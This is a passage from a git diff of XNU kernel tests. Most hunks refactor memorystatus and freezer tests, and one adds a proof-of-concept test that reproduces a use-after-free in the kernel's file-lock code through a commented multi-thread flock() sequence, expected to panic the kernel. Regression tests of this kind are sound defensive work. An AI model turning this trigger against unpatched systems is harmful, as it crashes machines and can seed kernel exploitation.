+       if (found_kernel_task != 2) {
+               /* One for kernel control port test, one for kernel read port test. */
+               T_FAIL("could not find kernel_task in list of tasks returned");
+       }
+}
index 6293e16c82556cc56bc837cd14f3c07fb46f83a5..504b074d8f4184a467329f1e2732c8726b39aebb 100644 (file)
@@ -534,6 +534,7 @@ execute_test(test_t *test)
                                if ((filefd = open(test->t_watchfile, O_RDONLY | O_SYMLINK)) == -1) {
                                        T_LOG("open() of watchfile %s failed: %d (%s)\n", test->t_watchfile,
                                            errno, strerror(errno));
+                                       res = -1;
                                }
                        }
 
@@ -610,9 +611,6 @@ execute_test(test_t *test)
                                if (test->t_file_is_fifo) {
                                        close(writefd);
                                }
-                       } else {
-                               T_LOG("Couldn't open test file %s to monitor: %d (%s)\n", test->t_watchfile);
-                               res = -1;
                        }
                        if (!test->t_is_poll_test) {
                                close(kqfd);
diff --git a/tests/launchd_plists/com.apple.xnu.test.mach_port.plist b/tests/launchd_plists/com.apple.xnu.test.mach_port.plist
new file mode 100644 (file)
index 0000000..d76f2a5
--- /dev/null
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+       <key>MachServices</key>
+       <dict>
+               <key>com.apple.xnu.test.mach_port</key>
+               <dict>
+                       <key>ResetAtClose</key>
+                       <true/>
+               </dict>
+       </dict>
+       <key>ThrottleInterval</key>
+       <integer>1</integer>
+       <key>UserName</key>
+       <string>root</string>
+       <key>ProcessType</key>
+       <string>Adaptive</string>
+       <key>EnvironmentVariables</key>
+       <dict>
+               <key>MallocNanoZone</key>
+               <string>1</string>
+       </dict>
+       <key>LaunchOnlyOnce</key>
+       <true/>
+</dict>
+</plist>
diff --git a/tests/lockf_uaf_poc/README b/tests/lockf_uaf_poc/README
new file mode 100644 (file)
index 0000000..0686e71
--- /dev/null
@@ -0,0 +1,5 @@
+This Proof-of-Concept (PoC) is based on code from a security researcher
+(see rdar://70587638), and should not be used for any other purpose other
+than this test.  In particular, this should not be used in other shipping
+code or as reference material to create shipping code without first checking
+with Apple Legal.
diff --git a/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c b/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c
new file mode 100644 (file)
index 0000000..9030656
--- /dev/null
@@ -0,0 +1,198 @@
+#include <fcntl.h>
+#include <pthread.h>
+#include <signal.h>
+#include <sys/fcntl.h>
+#include <unistd.h>
+#include <darwintest.h>
+#include <darwintest_utils.h>
+
+T_GLOBAL_META(
+       T_META_NAMESPACE("xnu.ipc"),
+       T_META_RUN_CONCURRENTLY(TRUE));
+
+#define TMP_FILE_NAME "lockf_uaf_poc_70587638"
+
+static int fd0, fd1, fd2;
+
+static int other_failure = 0;
+static int other_failure_line = 0;
+
+static pthread_t thr0, thr1, thr2;
+
+#define RECORD_ERROR(err) do {                  \
+       if (other_failure_line == 0) {          \
+               other_failure = (err);          \
+               other_failure_line = __LINE__;  \
+       }                                       \
+} while (0);
+#define MYCHECK_ERRNO(res) do {                 \
+       if ((res) < 0) {                        \
+               RECORD_ERROR((errno));          \
+               return NULL;                    \
+       }                                                                       \
+} while (0)
+#define MYCHECK_POSIX(res) do {                 \
+       if ((res) != 0) {                       \
+               RECORD_ERROR((res));            \
+               return NULL;                    \
+       }                                       \
+} while (0)
+
+#define CHECK_OTHER_FAILURE() do {                      \
+       int my_other_failure = other_failure;           \
+       int my_other_failure_line = other_failure_line; \
+       my_other_failure_line = 0;                      \
+       T_QUIET;                                        \
+       T_ASSERT_EQ(my_other_failure_line, 0,           \
+           "Other failure %d at line %d",              \
+           my_other_failure, my_other_failure_line);   \
+} while (0);
+
+static void *
+thr2_func(void *arg)
+{
+       int res;
+
+       /*
+        * Wait for thr1 to be blocking on attempting to acquire lock C. See the comment at the top of
+        * `thr1_func` for the reason why sleep is used.
+        */
+       (void) sleep(1u);
+
+       /*
+        * Acquire another shared lock (lock D) on the file. At this point the file has acquired 2
+        * locks; lock A and D which are both shared locks. It also has 2 exclusive locks currently
+        * blocking on lock A attempting to be acquired; lock B and C.
+        */
+       res = flock(fd2, LOCK_SH);
+       MYCHECK_ERRNO(res);
+
+       /*
+        * Unlock lock A, this will cause the first lock blocking on lock A to be unblocked (lock B)
+        * and all other locks blocking on it to be moved to blocking on the first blocked lock
+        * (lock C will now be blocking on lock B). Lock B's thread will be woken up resulting in it
+        * trying to re-acquire the lock on the file, as lock D is on the same file descriptor and
+        * already acquired on the file it will be promoted to an exclusive lock and B will be freed
+        * instead. At this point all locks blocking on lock B (lock C in this case) will now have a
+        * reference to a freed allocation.
+        */
+       res = flock(fd0, LOCK_UN);
+       MYCHECK_ERRNO(res);
+
+       return arg;
+}
+
+static void *
+thr1_func(void *arg)
+{
+       int res;
+       /*
+        * Wait for thr0 to be blocking on attempting to acquire lock B. Sleeping isn't great because
+        * it isn't an indication that the thread is blocked but I'm unsure how to detect a blocked
+        * thread programatically and a 1 second sleep has never failed so far of tests so for now that
+        * is what is done.
+        */
+       (void) sleep(1u);
+
+       // Another thread is required, spawn it now before blocking
+       res = pthread_create(&thr2, 0, thr2_func, 0);
+       MYCHECK_POSIX(res);
+
+       // Block attempting to acquire an exclusive lock - lock C
+       res = flock(fd1, LOCK_EX);
+       MYCHECK_ERRNO(res);
+
+       return arg;
+}
+
+static void *
+thr0_func(void *arg)
+{
+       int res;
+
+       // Acquire a shared lock - lock A
+       res = flock(fd0, LOCK_SH);
+       MYCHECK_ERRNO(res);
+
+       // Another thread is required, spawn it now before blocking
+       res = pthread_create(&thr1, 0, thr1_func, 0);
+       MYCHECK_POSIX(res);
+
+       // Block attempting to acquire an exclusive lock - lock B
+       res = flock(fd2, LOCK_EX);
+       MYCHECK_ERRNO(res);
+
+       return arg;
+}
+
+static void
+sigpipe_handler(int sig __unused, siginfo_t *sa __unused, void *ign __unused)
+{
+       return;
+}
+
+T_DECL(lockf_uaf_poc_70587638,
+    "Do a sequence which caused lf_setlock() to free something still in-use.",
+    T_META_ASROOT(true), T_META_CHECK_LEAKS(false))
+{
+       int res;
+       struct sigaction sa;
+
+       T_SETUPBEGIN;
+
+       (void) sigfillset(&sa.sa_mask);
+       sa.sa_sigaction = sigpipe_handler;
+       sa.sa_flags = SA_SIGINFO;
+       T_ASSERT_POSIX_SUCCESS(sigaction(SIGPIPE, &sa, NULL), "sigaction(SIGPIPE)");
+
+       // Setup all the file descriptors needed (fd0's open makes sure the file exists)
+       T_ASSERT_POSIX_SUCCESS(
+               fd0 = open(TMP_FILE_NAME, O_RDONLY | O_CREAT, 0666),
+               "open(\""TMP_FILE_NAME"\", O_RDONLY|O_CREAT, 0666)");
+       T_ASSERT_POSIX_SUCCESS(
+               fd1 = open(TMP_FILE_NAME, O_RDONLY, 0666),
+               "open(\""TMP_FILE_NAME"\", O_RDONLY, 0666)");
+       T_ASSERT_POSIX_SUCCESS(
+               fd2 = open(TMP_FILE_NAME, 0, 0666),
+               "open(\""TMP_FILE_NAME"\", O_RDONLY, 0666)");
+       T_SETUPEND;
+
+       /*
+        * Threads are used due to some locks blocking the thread when trying to acquire if a lock that
+        * blocks the requested lock already exists on the file. By using multiple threads there can be
+        * multiple locks blocking on attempting to acquire on a file.
+        */
+       res = pthread_create(&thr0, 0, thr0_func, 0);
+       T_ASSERT_POSIX_ZERO(res, "pthread_create thread 0");
+
+       /*
+        * Wait for lock B to be acquired which under the hood actually results in lock D being
+        * promoted to an exclusive lock and lock B being freed. At this point the bug has been
+        * triggered leaving lock C with a dangling pointer to lock B.
+        */
+       res = pthread_join(thr0, NULL);
+       T_ASSERT_POSIX_ZERO(res, "pthread_join thread 0");
+
+       CHECK_OTHER_FAILURE();
+
+       // Trigger a signal to wake lock C from sleep causing it to do a UAF access on lock B
+       res = pthread_kill(thr1, SIGPIPE);
+       T_ASSERT_POSIX_ZERO(res, "pthread_kill thread 1");
+
+       CHECK_OTHER_FAILURE();
+
+       /*
+        * The kernel should panic at this point. This is just to prevent the
+        * application exiting before lock C's thread has woken from the signal.
+        * The application exiting isn't a problem but it will cause all the
+        * fd to be closed which will cause locks to be unlocked. This
+        * shouldn't prevent the PoC from working but its just cleaner to
+        * wait here for the kernel to panic rather than exiting the process.
+        */
+       res = pthread_join(thr1, NULL);
+       T_ASSERT_POSIX_ZERO(res, "pthread_join thread 1");
+
+       CHECK_OTHER_FAILURE();
+
+       T_PASS("lockf_uaf_poc_70587638");
+}
index 0e1e51ad6a19e457619d76780ac2deceb591e849..eeffaf9edbda1b34b9dfff8d6625da3ca38d8448 100644 (file)
@@ -1,5 +1,6 @@
 #include <stdio.h>
 #include <signal.h>
+#include <sys/proc.h>
 #include <sys/sysctl.h>
 #include <sys/kern_memorystatus.h>
 #include <sys/kern_memorystatus_freeze.h>
@@ -553,6 +554,7 @@ launch_background_helper(const char* variant)
        pid_t pid;
        char **launch_tool_args;
        char testpath[PATH_MAX];
+       char *variant_cpy = strdup(variant);
        uint32_t testpath_buf_size;
        int ret;
 
@@ -562,7 +564,7 @@ launch_background_helper(const char* variant)
        launch_tool_args = (char *[]){
                testpath,
                "-n",
-               variant,
+               variant_cpy,
                NULL
        };
        ret = dt_launch_tool(&pid, launch_tool_args, false, NULL, NULL);
@@ -573,6 +575,7 @@ launch_background_helper(const char* variant)
        /* Set the process's managed bit, so that the kernel treats this process like an app instead of a sysproc. */
        ret = memorystatus_control(MEMORYSTATUS_CMD_SET_PROCESS_IS_MANAGED, pid, 1, NULL, 0);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "memorystatus_control");
+       free(variant_cpy);
        return pid;
 }
 
@@ -608,7 +611,7 @@ memorystatus_assertion_test_demote_frozen()
        /* these values will remain fixed during testing */
        int             active_limit_mb = 15;   /* arbitrary */
        int             inactive_limit_mb = 7;  /* arbitrary */
-       int             demote_value = 1;
+       __block int             demote_value = 1;
        /* Launch the child process, and elevate its priority */
        int requestedpriority;
        dispatch_source_t ds_signal, ds_exit;
@@ -729,20 +732,20 @@ is_proc_in_frozen_list(pid_t pid, char* name, size_t name_len)
 }
 
 static void
-drop_jetsam_snapshot_ownership(void)
+unset_testing_pid(void)
 {
        int ret;
-       ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP, 0, MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP, NULL, 0);
+       ret = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0, MEMORYSTATUS_FLAGS_UNSET_TESTING_PID, NULL, 0);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, 0, "Drop ownership of jetsam snapshot");
 }
 
 static void
-take_jetsam_snapshot_ownership(void)
+set_testing_pid(void)
 {
        int ret;
-       ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP, 0, MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP, NULL, 0);
+       ret = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0, MEMORYSTATUS_FLAGS_SET_TESTING_PID, NULL, 0);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "Take ownership of jetsam snapshot");
-       T_ATEND(drop_jetsam_snapshot_ownership);
+       T_ATEND(unset_testing_pid);
 }
 
 /*
@@ -809,6 +812,17 @@ get_jetsam_snapshot_entry(memorystatus_jetsam_snapshot_t *snapshot, pid_t pid)
        return NULL;
 }
 
+static dispatch_source_t
+run_block_after_signal(int sig, dispatch_block_t block)
+{
+       dispatch_source_t ds_signal;
+       signal(sig, SIG_IGN);
+       ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, (uintptr_t) sig, 0, dispatch_get_main_queue());
+       T_QUIET; T_ASSERT_NOTNULL(ds_signal, "dispatch_source_create");
+       dispatch_source_set_event_handler(ds_signal, block);
+       return ds_signal;
+}
+
 /*
  * Launches the child & runs the given block after the child signals.
  * If exit_with_child is true, the test will exit when the child exits.
@@ -818,11 +832,7 @@ test_after_background_helper_launches(bool exit_with_child, const char* variant,
 {
        dispatch_source_t ds_signal, ds_exit;
 
-       /* Run the test block after the child launches & signals it's ready. */
-       signal(SIGUSR1, SIG_IGN);
-       ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, dispatch_get_main_queue());
-       T_QUIET; T_ASSERT_NOTNULL(ds_signal, "dispatch_source_create");
-       dispatch_source_set_event_handler(ds_signal, test_block);
+       ds_signal = run_block_after_signal(SIGUSR1, test_block);
        /* Launch the child process. */
        child_pid = launch_background_helper(variant);
        /* Listen for exit. */
@@ -843,7 +853,6 @@ test_after_background_helper_launches(bool exit_with_child, const char* variant,
                dispatch_activate(ds_exit);
        }
        dispatch_activate(ds_signal);
-       dispatch_main();
 }
 
 T_DECL(get_frozen_procs, "List processes in the freezer") {
@@ -862,6 +871,7 @@ T_DECL(get_frozen_procs, "List processes in the freezer") {
                T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process");
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(frozen_to_swap_accounting, "jetsam snapshot has frozen_to_swap accounting") {
@@ -897,11 +907,12 @@ T_DECL(frozen_to_swap_accounting, "jetsam snapshot has frozen_to_swap accounting
                T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process");
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(freezer_snapshot, "App kills are recorded in the freezer snapshot") {
        /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */
-       take_jetsam_snapshot_ownership();
+       set_testing_pid();
 
        test_after_background_helper_launches(false, "frozen_background", ^{
                int ret;
@@ -920,11 +931,12 @@ T_DECL(freezer_snapshot, "App kills are recorded in the freezer snapshot") {
                free(snapshot);
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(freezer_snapshot_consume, "Freezer snapshot is consumed on read") {
        /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */
-       take_jetsam_snapshot_ownership();
+       set_testing_pid();
 
        test_after_background_helper_launches(false, "frozen_background", ^{
                int ret;
@@ -948,12 +960,13 @@ T_DECL(freezer_snapshot_consume, "Freezer snapshot is consumed on read") {
                free(snapshot);
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(freezer_snapshot_frozen_state, "Frozen state is recorded in freezer snapshot") {
        skip_if_freezer_is_disabled();
        /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */
-       take_jetsam_snapshot_ownership();
+       set_testing_pid();
 
        test_after_background_helper_launches(false, "frozen_background", ^{
                int ret;
@@ -975,12 +988,13 @@ T_DECL(freezer_snapshot_frozen_state, "Frozen state is recorded in freezer snaps
                free(snapshot);
                T_END;
        });
+       dispatch_main();
 }
 
 T_DECL(freezer_snapshot_thaw_state, "Thaw count is recorded in freezer snapshot") {
        skip_if_freezer_is_disabled();
        /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */
-       take_jetsam_snapshot_ownership();
+       set_testing_pid();
 
        test_after_background_helper_launches(false, "frozen_background", ^{
                int ret;
@@ -1017,11 +1031,6 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) {
        /* Set the process to freezable */
        kern_ret = memorystatus_control(MEMORYSTATUS_CMD_SET_PROCESS_IS_FREEZABLE, getpid(), 1, NULL, 0);
        T_QUIET; T_ASSERT_POSIX_SUCCESS(kern_ret, "set process is freezable");
-       /* Signal to our parent that we can be frozen */
-       if (kill(getppid(), SIGUSR1) != 0) {
-               T_LOG("Unable to signal to parent process!");
-               exit(SIGNAL_TO_PARENT_FAILED);
-       }
 
        /* We should not be frozen yet. */
        is_frozen = memorystatus_control(MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZEN, getpid(), 0, NULL, 0);
@@ -1033,9 +1042,6 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) {
                exit(FROZEN_BIT_SET);
        }
 
-
-       sig_t sig_ret = signal(SIGUSR1, SIG_IGN);
-       T_QUIET; T_WITH_ERRNO; T_ASSERT_NE(sig_ret, SIG_ERR, "signal(SIGUSR1, SIG_IGN)");
        ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, dispatch_get_main_queue());
        if (ds_signal == NULL) {
                exit(DISPATCH_SOURCE_CREATE_FAILED);
@@ -1055,6 +1061,15 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) {
        });
        dispatch_activate(ds_signal);
 
+       sig_t sig_ret = signal(SIGUSR1, SIG_IGN);
+       T_QUIET; T_WITH_ERRNO; T_ASSERT_NE(sig_ret, SIG_ERR, "signal(SIGUSR1, SIG_IGN)");
+
+       /* Signal to our parent that we can be frozen */
+       if (kill(getppid(), SIGUSR1) != 0) {
+               T_LOG("Unable to signal to parent process!");
+               exit(SIGNAL_TO_PARENT_FAILED);
+       }
+
        dispatch_main();
 }
 
@@ -1074,4 +1089,191 @@ T_DECL(memorystatus_get_process_is_frozen, "MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZ
                kill(child_pid, SIGUSR1);
                /* The child will checks its own frozen state & exit. */
        });
+       dispatch_main();
+}
+
+static unsigned int freeze_pages_min_old;
+static int throttle_enabled_old;
+static void cleanup_memorystatus_freeze_top_process() {
+       sysctlbyname("kern.memorystatus_freeze_pages_min", NULL, NULL, &freeze_pages_min_old, sizeof(freeze_pages_min_old));
+       sysctlbyname("kern.memorystatus_freeze_throttle_enabled", NULL, NULL, &throttle_enabled_old, sizeof(throttle_enabled_old));
+}
+
+#define P_MEMSTAT_FROZEN 0x00000002
+T_DECL(memorystatus_freeze_top_process, "memorystatus_freeze_top_process chooses the correct process",
+    T_META_ASROOT(true),
+    T_META_REQUIRES_SYSCTL_EQ("kern.development", 1),
+    T_META_REQUIRES_SYSCTL_EQ("vm.freeze_enabled", 1)) {
+       int32_t memorystatus_freeze_band = 0;
+       size_t memorystatus_freeze_band_size = sizeof(memorystatus_freeze_band);
+       size_t freeze_pages_min_size = sizeof(freeze_pages_min_old);
+       unsigned int freeze_pages_min_new = 0;
+       size_t throttle_enabled_old_size = sizeof(throttle_enabled_old);
+       int throttle_enabled_new = 1;
+       __block errno_t ret;
+       __block int maxproc;
+       size_t maxproc_size = sizeof(maxproc);
+
+       ret = sysctlbyname("kern.maxproc", &maxproc, &maxproc_size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kern.maxproc");
+       sysctlbyname("kern.memorystatus_freeze_jetsam_band", &memorystatus_freeze_band, &memorystatus_freeze_band_size, NULL, 0);
+
+       /* Set min pages to 0 and disable the budget to ensure we can always freeze the child. */
+       ret = sysctlbyname("kern.memorystatus_freeze_pages_min", &freeze_pages_min_old, &freeze_pages_min_size, &freeze_pages_min_new, sizeof(freeze_pages_min_new));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "set kern.memorystatus_freeze_pages_min");
+       ret = sysctlbyname("kern.memorystatus_freeze_throttle_enabled", &throttle_enabled_old, &throttle_enabled_old_size, &throttle_enabled_new, sizeof(throttle_enabled_new));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "set kern.memorystatus_freeze_throttle_enabled");
+       T_ATEND(cleanup_memorystatus_freeze_top_process);
+       /* Take ownership of the freezer probabilities for the duration of the test so that we don't race with dasd. */
+       set_testing_pid();
+       test_after_background_helper_launches(true, "frozen_background", ^{
+               int32_t child_band = JETSAM_PRIORITY_DEFAULT;
+               /* Place the child in the idle band so that it gets elevated like a typical app. */
+               move_to_idle_band(child_pid);
+               ret = pid_suspend(child_pid);
+               T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+
+               size_t buffer_len = sizeof(memorystatus_properties_entry_v1_t) * (size_t) maxproc;
+               memorystatus_properties_entry_v1_t *properties_list = malloc(buffer_len);
+               T_QUIET; T_ASSERT_NOTNULL(properties_list, "malloc properties array");
+               size_t properties_list_len = 0;
+               /* The child needs to age down into the idle band before it's eligible to be frozen. */
+               T_LOG("Waiting for child to age into the idle band.");
+               while (child_band != JETSAM_PRIORITY_IDLE) {
+                       memset(properties_list, 0, buffer_len);
+                       properties_list_len = 0;
+                       memorystatus_jetsam_snapshot_t *snapshot = get_jetsam_snapshot(MEMORYSTATUS_FLAGS_SNAPSHOT_ON_DEMAND, false);
+
+                       bool found = false;
+                       for (size_t i = 0; i < snapshot->entry_count; i++) {
+                               memorystatus_jetsam_snapshot_entry_t *snapshot_entry = &snapshot->entries[i];
+                               if (snapshot_entry->priority <= memorystatus_freeze_band && !snapshot_entry->killed) {
+                                       pid_t pid = snapshot_entry->pid;
+                                       memorystatus_properties_entry_v1_t *property_entry = &properties_list[properties_list_len++];
+                                       property_entry->version = 1;
+                                       property_entry->pid = pid;
+                                       if (pid == child_pid) {
+                                               found = true;
+                                               property_entry->use_probability = 1;
+                                               child_band = snapshot_entry->priority;
+                                       } else {
+                                               property_entry->use_probability = 0;
+                                       }
+                                       strncpy(property_entry->proc_name, snapshot_entry->name, MAXCOMLEN);
+                                       property_entry->proc_name[MAXCOMLEN] = '\0';
+                               }
+                       }
+                       T_QUIET; T_ASSERT_TRUE(found, "Child is in on demand snapshot");
+                       free(snapshot);
+               }
+               ret = memorystatus_control(MEMORYSTATUS_CMD_GRP_SET_PROPERTIES, 0, MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY, properties_list, sizeof(memorystatus_properties_entry_v1_t) * properties_list_len);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY");
+               free(properties_list);
+               int val = 1;
+               ret = sysctlbyname("vm.memorystatus_freeze_top_process", NULL, NULL, &val, sizeof(val));
+               T_ASSERT_POSIX_SUCCESS(ret, "freeze_top_process");
+               /* Verify that the process was frozen. */
+               memorystatus_jetsam_snapshot_t *snapshot = get_jetsam_snapshot(MEMORYSTATUS_FLAGS_SNAPSHOT_ON_DEMAND, false);
+               memorystatus_jetsam_snapshot_entry_t *entry = get_jetsam_snapshot_entry(snapshot, child_pid);
+               T_ASSERT_NOTNULL(entry, "child is in snapshot");
+               if (!(entry->state & P_MEMSTAT_FROZEN)) {
+                       T_LOG("Not frozen. Skip reason: %d", entry->jse_freeze_skip_reason);
+               }
+               T_ASSERT_TRUE(entry->state & P_MEMSTAT_FROZEN, "child is frozen");
+               free(snapshot);
+               ret = pid_resume(child_pid);
+               T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze");
+
+               /* Kill the child */
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process");
+               T_END;
+       });
+       dispatch_main();
+}
+
+static int
+memorystatus_freezer_thaw_percentage(void)
+{
+       int val;
+       size_t size = sizeof(val);
+       int ret = sysctlbyname("kern.memorystatus_freezer_thaw_percentage", &val, &size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to query kern.memorystatus_freezer_thaw_percentage");
+       return val;
+}
+
+static void
+reset_interval(void)
+{
+       uint32_t freeze_daily_budget_mb = 0;
+       size_t size = sizeof(freeze_daily_budget_mb);
+       int ret;
+       uint64_t new_budget;
+       ret = sysctlbyname("kern.memorystatus_freeze_daily_mb_max", &freeze_daily_budget_mb, &size, NULL, 0);
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to query kern.memorystatus_freeze_daily_mb_max");
+       new_budget = (freeze_daily_budget_mb * (1UL << 20) / vm_page_size);
+       ret = sysctlbyname("kern.memorystatus_freeze_budget_pages_remaining", NULL, NULL, &new_budget, sizeof(new_budget));
+       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to set kern.memorystatus_freeze_budget_pages_remaining");
+}
+
+static pid_t second_child;
+static void
+cleanup_memorystatus_freezer_thaw_percentage(void)
+{
+       kill(second_child, SIGKILL);
+}
+
+T_DECL(memorystatus_freezer_thaw_percentage, "memorystatus_freezer_thaw_percentage updates correctly",
+    T_META_ASROOT(true),
+    T_META_REQUIRES_SYSCTL_EQ("kern.development", 1),
+    T_META_REQUIRES_SYSCTL_EQ("vm.freeze_enabled", 1)) {
+       __block dispatch_source_t first_signal_block;
+       /* Take ownership of the freezer probabilities for the duration of the test so that nothing new gets frozen by dasd. */
+       set_testing_pid();
+       reset_interval();
+
+       /* Spawn one child that will remain frozen throughout the whole test & another that will be thawed. */
+       first_signal_block = run_block_after_signal(SIGUSR1, ^{
+               move_to_idle_band(second_child);
+               __block int ret = pid_suspend(second_child);
+               T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+               freeze_process(second_child);
+               T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "thaw percentage is still 0 after freeze");
+               dispatch_source_cancel(first_signal_block);
+               test_after_background_helper_launches(true, "frozen_background", ^{
+                       reset_interval();
+                       T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "new interval starts with a thaw percentage of 0");
+                       move_to_idle_band(child_pid);
+                       ret = pid_suspend(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+                       freeze_process(child_pid);
+                       ret = pid_resume(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze");
+                       int percentage_after_thaw = memorystatus_freezer_thaw_percentage();
+                       T_QUIET; T_ASSERT_GT(percentage_after_thaw, 0, "thaw percentage is higher after thaw");
+
+                       ret = pid_suspend(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+                       freeze_process(child_pid);
+                       ret = pid_resume(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze");
+                       T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), percentage_after_thaw, "thaw percentage is unchanged after second thaw");
+
+                       ret = pid_suspend(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended");
+                       freeze_process(child_pid);
+                       reset_interval();
+                       T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "new interval starts with a 0 thaw percentage");
+                       ret = pid_resume(child_pid);
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze");
+                       T_QUIET; T_ASSERT_GT(memorystatus_freezer_thaw_percentage(), 0, "thaw percentage goes back up in new interval");
+
+                       T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "failed to kill child");
+                       T_END;
+               });
+       });
+
+       second_child = launch_background_helper("frozen_background");
+       T_ATEND(cleanup_memorystatus_freezer_thaw_percentage);
+       dispatch_activate(first_signal_block);
+       dispatch_main();
 }
index b14feabddb023949ffc57a26ef079b4950b0e7c2..7574fee55ff073a838453ac5436b79f2811ad991 100644 (file)
@@ -122,8 +122,8 @@ memorystatus_assertion_test_repetitive(char *test, boolean_t turn_on_dirty_track
        pid_t mypid = getpid();
 
        /* these values will remain fixed during testing */
-       int             active_limit_mb = 15;   /* arbitrary */
-       int             inactive_limit_mb = 10;  /* arbitrary */
+       int             active_limit_mb = 35;   /* arbitrary */
+       int             inactive_limit_mb = 25;  /* arbitrary */
 
        /* these values may vary during test */
        int             requestedpriority = 0;
@@ -224,8 +224,8 @@ memorystatus_assertion_test_allow_idle_exit()
        pid_t mypid = getpid();
 
        /* these values will remain fixed during testing */
-       int active_limit_mb   = 15; /* arbitrary */
-       int inactive_limit_mb = 10;  /* arbitrary */
+       int active_limit_mb   = 35; /* arbitrary */
+       int inactive_limit_mb = 25;  /* arbitrary */
 
        /* these values may vary during test */
        int requestedpriority = JETSAM_PRIORITY_UI_SUPPORT;
@@ -349,8 +349,8 @@ memorystatus_assertion_test_do_not_allow_idle_exit()
        pid_t mypid = getpid();
 
        /* these values will remain fixed during testing */
-       int             active_limit_mb = 15;   /* arbitrary */
-       int             inactive_limit_mb = 10;  /* arbitrary */
+       int             active_limit_mb = 35;   /* arbitrary */
+       int             inactive_limit_mb = 25;  /* arbitrary */
        int             requestedpriority = JETSAM_PRIORITY_AUDIO_AND_ACCESSORY;
 
        T_SETUPBEGIN;
index ff73724cdf7467907d6264f67a634bd000064668..65f29b569fa7e7e392abe45c606b7188aa61bca5 100644 (file)
@@ -16,6 +16,8 @@
 #include <darwintest.h>
 #include <darwintest_utils.h>
 
+#include "test_utils.h"
+
 T_GLOBAL_META(
        T_META_NAMESPACE("xnu.vm"),
        T_META_CHECK_LEAKS(false)
@@ -77,25 +79,6 @@ static char *child_exit_why[] = {
        "malloc() failed",
 };
 
-/*
- * Corpse collection only happens in development kernels.
- * So we need this to detect if the test is relevant.
- */
-static boolean_t
-is_development_kernel(void)
-{
-       int ret;
-       int dev = 0;
-       size_t dev_size = sizeof(dev);
-
-       ret = sysctlbyname("kern.development", &dev, &dev_size, NULL, 0);
-       if (ret != 0) {
-               return FALSE;
-       }
-
-       return dev != 0;
-}
-
 /*
  * Set/Get the sysctl used to determine if corpse collection occurs.
  * This is done by the kernel checking for a specific PID.
index db0613f961c868f98ad7886793dabbb913b002c8..9b86fe53ffa4e71c77bab96eab85add48d0dc25b 100644 (file)
@@ -8,6 +8,8 @@
 #include <TargetConditionals.h>
 #include <perfcheck_keys.h>
 
+#include "benchmark/helpers.h"
+
 T_GLOBAL_META(
        T_META_NAMESPACE("xnu.vm.perf"),
        T_META_CHECK_LEAKS(false),
@@ -74,7 +76,6 @@ static void execute_threads(void);
 static void *thread_setup(void *arg);
